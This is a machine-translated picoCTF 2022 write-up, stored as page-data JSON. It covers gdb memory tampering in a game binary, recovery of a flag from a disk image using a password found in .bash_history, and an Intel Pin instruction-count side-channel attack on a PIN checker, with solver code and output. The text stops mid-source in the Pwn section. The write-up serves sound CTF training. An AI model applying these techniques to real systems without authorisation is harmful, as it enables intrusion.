{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-picoctf-2022-en","result":{"data":{"markdownRemark":{"id":"bb4f7c5a-2aaa-570b-96fb-31f3e8de1078","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-picoctf-2022\">original page</a>.</p>\n</blockquote>\n<p>I participated in <a href=\"https://play.picoctf.org/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">picoCTF2022</a>.</p>\n<p>This time I tried some Forensic and Pwn challenges in addition to my usual Rev.</p>\n<p>I cleared all of the Rev and Forensic challenges, but unfortunately I still had two Pwn problems left unsolved.</p>\n<p>Even so, I picked up around three new techniques, so it was very worthwhile.</p>\n<p>In this article, I’ll briefly write up the problems where I personally learned something.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#rev\">Rev</a></p>\n<ul>\n<li><a href=\"#wizardlikerev\">Wizardlike(Rev)</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#forensic\">Forensic</a></p>\n<ul>\n<li><a href=\"#operation-orchidforensic\">Operation Orchid(Forensic)</a></li>\n<li><a href=\"#sidechannelsidechannel\">SideChannel(SideChannel)</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#pwn\">Pwn</a></p>\n<ul>\n<li><a href=\"#function-overwritepwn\">function overwrite(Pwn)</a></li>\n<li><a href=\"#ropfupwn\">ropfu(Pwn)</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"rev\" style=\"position:relative;\"><a href=\"#rev\" aria-label=\"rev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Rev</h2>\n<p>To be honest, the Rev challenges were fairly easy overall, so there is not much to write about. But the last one was an unusual type of problem and pretty interesting, so I wanted to summarize it.</p>\n<h3 id=\"wizardlikerev\" style=\"position:relative;\"><a href=\"#wizardlikerev\" aria-label=\"wizardlikerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Wizardlike(Rev)</h3>\n<p>The problem statement looked like this.</p>\n<blockquote>\n<h4 id=\"description\" style=\"position:relative;\"><a href=\"#description\" aria-label=\"description permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>Do you seek your destiny in these deplorable dungeons? If so, you may want to look elsewhere. Many have gone before you and honestly, they’ve cleared out the place of all monsters, ne’erdowells, bandits and every other sort of evil foe. The dungeons themselves have seen better days too. There’s a lot of missing floors and key passages blocked off. You’d have to be a real wizard to make any progress in this sorry excuse for a dungeon!Download the <a href=\"https://artifacts.picoctf.net/c/153/game\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">game</a>.’<code class=\"language-text\">w</code>’, ’<code class=\"language-text\">a</code>’, ’<code class=\"language-text\">s</code>’, ’<code class=\"language-text\">d</code>’ moves your character and ’<code class=\"language-text\">Q</code>’ quits. You’ll need to improvise some wizardly abilities to find the flag in this dungeon crawl. ’<code class=\"language-text\">.</code>’ is floor, ’<code class=\"language-text\">#</code>’ are walls, ’<code class=\"language-text\">&lt;</code>’ are stairs up to previous level, and ’<code class=\"language-text\">></code>’ are stairs down to next level.</p>\n</blockquote>\n<p>You are given a game binary that feels like a console version of The Tower of Druaga.</p>\n<p>The challenge is to climb the tower and uncover the flag, but unfortunately the map is structured so that you cannot climb it by playing normally.</p>\n<p>Because of that, the intended solution was probably to identify the memory addresses storing the floor and coordinates, then tamper with them arbitrarily to warp around the map while exploring.</p>\n<p>The memory addresses for the floor and coordinates themselves can be obtained easily by decompiling the binary with Ghidra or a similar tool.</p>\n<p>To modify memory addresses during gameplay, I used gdb remote debugging.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># gdbserverを使用してゲームを起動</span>\ngdbserver localhost:1234 game-p\n\n<span class=\"token comment\"># 別のコンソールからgdbを起動して接続</span>\ngdb\ntarget remote localhost:1234</code></pre></div>\n<p>With this, you can solve the challenge while moving between floors and around the map.</p>\n<p>Unfortunately, choosing the coordinates for each map move involved a lot of guesswork and was pretty tedious.</p>\n<p>So in the end, I identified the map information for each floor in the data section with Ghidra, then recovered all of the maps at once using the following script, which I reversed from the program used to update the game’s map. That let me get the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pprint <span class=\"token keyword\">import</span> pprint\n\ntable <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n    <span class=\"token punctuation\">[</span><span class=\"token string\">\" \"</span> <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span> <span class=\"token keyword\">for</span> j <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">]</span>\n\ndata <span class=\"token operator\">=</span> <span class=\"token operator\">&lt;</span>MapData<span class=\"token operator\">></span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> end<span class=\"token operator\">=</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> i <span class=\"token operator\">%</span> <span class=\"token number\">100</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"forensic\" style=\"position:relative;\"><a href=\"#forensic\" aria-label=\"forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Forensic</h2>\n<p>I learned several new techniques in the Forensic challenges, so I am recording them here.</p>\n<h3 id=\"operation-orchidforensic\" style=\"position:relative;\"><a href=\"#operation-orchidforensic\" aria-label=\"operation orchidforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Operation Orchid(Forensic)</h3>\n<blockquote>\n<h4 id=\"description-1\" style=\"position:relative;\"><a href=\"#description-1\" aria-label=\"description 1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>Download this disk image and find the flag.Note: if you are using the webshell, download and extract the disk image into <code class=\"language-text\">/tmp</code> not your home directory.</p>\n</blockquote>\n<p>There was also a similar challenge called “Operation Oni”, but this one was about finding the information you need inside an image file.</p>\n<p>The basic flow was to identify a mountable section inside the image file, mount it locally, and then explore the directories.</p>\n<p>First, use the <code class=\"language-text\">fdisk -lu</code> command to inspect the image file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">fdisk</span> -lu disk.img\nDisk disk.img: <span class=\"token number\">400</span> MiB, <span class=\"token number\">419430400</span> bytes, <span class=\"token number\">819200</span> sectors\nUnits: sectors of <span class=\"token number\">1</span> * <span class=\"token number\">512</span> <span class=\"token operator\">=</span> <span class=\"token number\">512</span> bytes\nSector size <span class=\"token punctuation\">(</span>logical/physical<span class=\"token punctuation\">)</span>: <span class=\"token number\">512</span> bytes / <span class=\"token number\">512</span> bytes\nI/O size <span class=\"token punctuation\">(</span>minimum/optimal<span class=\"token punctuation\">)</span>: <span class=\"token number\">512</span> bytes / <span class=\"token number\">512</span> bytes\nDisklabel type: dos\nDisk identifier: 0xb11a86e3\nDevice     Boot  Start    End Sectors  Size Id Type\ndisk.img1  *      <span class=\"token number\">2048</span> <span class=\"token number\">206847</span>  <span class=\"token number\">204800</span>  100M <span class=\"token number\">83</span> Linux\ndisk.img2       <span class=\"token number\">206848</span> <span class=\"token number\">411647</span>  <span class=\"token number\">204800</span>  100M <span class=\"token number\">82</span> Linux swap / Solaris\ndisk.img3       <span class=\"token number\">411648</span> <span class=\"token number\">819199</span>  <span class=\"token number\">407552</span>  199M <span class=\"token number\">83</span> Linux</code></pre></div>\n<p>Here, I wanted to mount <code class=\"language-text\">disk.img3</code>, so I used the <code class=\"language-text\">mount</code> command with an offset equal to the start sector number <code class=\"language-text\">411648</code> multiplied by the sector size <code class=\"language-text\">512</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> <span class=\"token function\">mount</span> -o loop,offset<span class=\"token operator\">=</span><span class=\"token number\">210763776</span> disk.img ./mnt\n<span class=\"token function\">sudo</span> <span class=\"token function\">chown</span> ubuntu:ubuntu ./* -R</code></pre></div>\n<p>Changing the owner as well makes exploration easier.</p>\n<p>When I explored the mounted directory, I found the following command history in <code class=\"language-text\">.bash_history</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">nano</span> flag.txt \nopenssl\nopenssl aes256 -salt -in flag.txt -out flag.txt.enc -k unbreakablepassword1234567\nshred -u flag.txt\n<span class=\"token function\">ls</span> -al</code></pre></div>\n<p>In other words, if you restore the file encrypted with <code class=\"language-text\">aes256</code> using <code class=\"language-text\">unbreakablepassword1234567</code>, you can get the flag.</p>\n<p>So I decrypted it with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">openssl aes256 -d -salt -in flag.txt.enc -out flag.txt -k unbreakablepassword1234567</code></pre></div>\n<p>That gives you the flag.</p>\n<h3 id=\"sidechannelsidechannel\" style=\"position:relative;\"><a href=\"#sidechannelsidechannel\" aria-label=\"sidechannelsidechannel permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SideChannel(SideChannel)</h3>\n<blockquote>\n<h4 id=\"description-2\" style=\"position:relative;\"><a href=\"#description-2\" aria-label=\"description 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>There’s something fishy about this PIN-code checker, can you figure out the PIN and get the flag?Download the PIN checker program here <a href=\"https://artifacts.picoctf.net/c/146/pin_checker\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">pin_checker</a>Once you’ve figured out the PIN (and gotten the checker program to accept it), connect to the master server using <code class=\"language-text\">nc saturn.picoctf.net 50562</code> and provide it the PIN to get your flag.</p>\n</blockquote>\n<p>I understood how to approach this one, but actually getting the flag was very difficult. Still, it was an extremely interesting problem.</p>\n<p>First, download PinTool from <a href=\"https://www.intel.com/content/www/us/en/developer/articles/tool/pin-a-binary-instrumentation-tool-downloads.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Pin - A Binary Instrumentation Tool - Downloads</a>.</p>\n<p>When you extract the downloaded file, you get a directory like this.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">ls</span> -l\ntotal <span class=\"token number\">388</span>\n-rw-r--r-- <span class=\"token number\">1</span> ubuntu ubuntu  <span class=\"token number\">63816</span> Feb <span class=\"token number\">16</span> 02:04 README\ndrwxr-x--- <span class=\"token number\">3</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 doc\ndrwxr-x--- <span class=\"token number\">9</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 extras\ndrwxr-x--- <span class=\"token number\">6</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:12 ia32\ndrwxr-x--- <span class=\"token number\">6</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 intel64\ndrwxr-xr-x <span class=\"token number\">2</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 licensing\n-rwxr-xr-x <span class=\"token number\">1</span> ubuntu ubuntu <span class=\"token number\">292996</span> Feb <span class=\"token number\">16</span> 02:09 pin\n-rwxr-x--- <span class=\"token number\">1</span> ubuntu ubuntu   <span class=\"token number\">8418</span> Feb <span class=\"token number\">16</span> 02:15 pin.sig\ndrwxr-x--- <span class=\"token number\">5</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 <span class=\"token builtin class-name\">source</span></code></pre></div>\n<p>From there, you need to build PinTool, and since the challenge binary is a 32-bit ELF binary, you need to build the <code class=\"language-text\">ia32</code> tools.</p>\n<p>So first, install the packages required for the build.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> <span class=\"token function\">apt-get</span> <span class=\"token function\">install</span> libc6-dev-i386\n<span class=\"token function\">sudo</span> <span class=\"token function\">apt-get</span> <span class=\"token function\">install</span> gcc-multilib g++-multilib</code></pre></div>\n<p>Next, move to <code class=\"language-text\">source/tools/SimpleExamples</code> and build the tool.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">cd</span> source/tools/SimpleExamples$\n<span class=\"token function\">make</span> all <span class=\"token assign-left variable\">TARGET</span><span class=\"token operator\">=</span>ia32</code></pre></div>\n<p>Note that you need to specify <code class=\"language-text\">TARGET=ia32</code>.</p>\n<p>If the build succeeds, <code class=\"language-text\">~/pintools/source/tools/SimpleExamples/obj-ia32/inscount2_mt.so</code> should be generated.</p>\n<p>Then you can use it to identify the PIN one digit at a time with a side-channel attack.</p>\n<p>Below is the solver I used.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> subprocess\ncmd <span class=\"token operator\">=</span> <span class=\"token string\">\"/home/ubuntu/pintools/pin -t /home/ubuntu/pintools/source/tools/SimpleExamples/obj-ia32/inscount2_mt.so -- ./pin_checker\"</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span>\nans <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">10</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    t <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"0\"</span><span class=\"token operator\">*</span><span class=\"token number\">7</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>t<span class=\"token punctuation\">)</span>\n    cp <span class=\"token operator\">=</span> subprocess<span class=\"token punctuation\">.</span>run<span class=\"token punctuation\">(</span>cmd<span class=\"token punctuation\">,</span> <span class=\"token builtin\">input</span><span class=\"token operator\">=</span>t<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    \n<span class=\"token comment\"># 48390513</span></code></pre></div>\n<p>The code above changes the first digit and checks the result.</p>\n<p>If you look at each PIN input and the pintool count results from running it, you can see that the value becomes extremely large when the first digit is <code class=\"language-text\">4</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">00000000\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">53421446</span>\n\n<span class=\"token number\">10000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">60610315</span>\n\n<span class=\"token number\">20000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">66361386</span>\n\n<span class=\"token number\">30000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">66840760</span>\n\n<span class=\"token number\">40000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">314657590</span>\n\n<span class=\"token number\">50000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">61089559</span>\n\n<span class=\"token number\">60000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">61568816</span>\n\n<span class=\"token number\">70000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">62527330</span>\n\n<span class=\"token number\">80000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">61089676</span>\n\n<span class=\"token number\">90000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">62048086</span></code></pre></div>\n<p>After that, you can identify the correct PIN by repeating the same process for all eight digits.</p>\n<h2 id=\"pwn\" style=\"position:relative;\"><a href=\"#pwn\" aria-label=\"pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Pwn</h2>\n<h3 id=\"function-overwritepwn\" style=\"position:relative;\"><a href=\"#function-overwritepwn\" aria-label=\"function overwritepwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>function overwrite(Pwn)</h3>\n<blockquote>\n<h4 id=\"description-3\" style=\"position:relative;\"><a href=\"#description-3\" aria-label=\"description 3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>Story telling class 2/2</p>\n</blockquote>\n<p>This hardly counts as a description, but the challenge provided the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/types.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;wchar.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;locale.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUFSIZE</span> <span class=\"token expression\"><span class=\"token number\">64</span></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">FLAGSIZE</span> <span class=\"token expression\"><span class=\"token number\">64</span></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> score <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token class-name\">size_t</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> len<span class=\"token 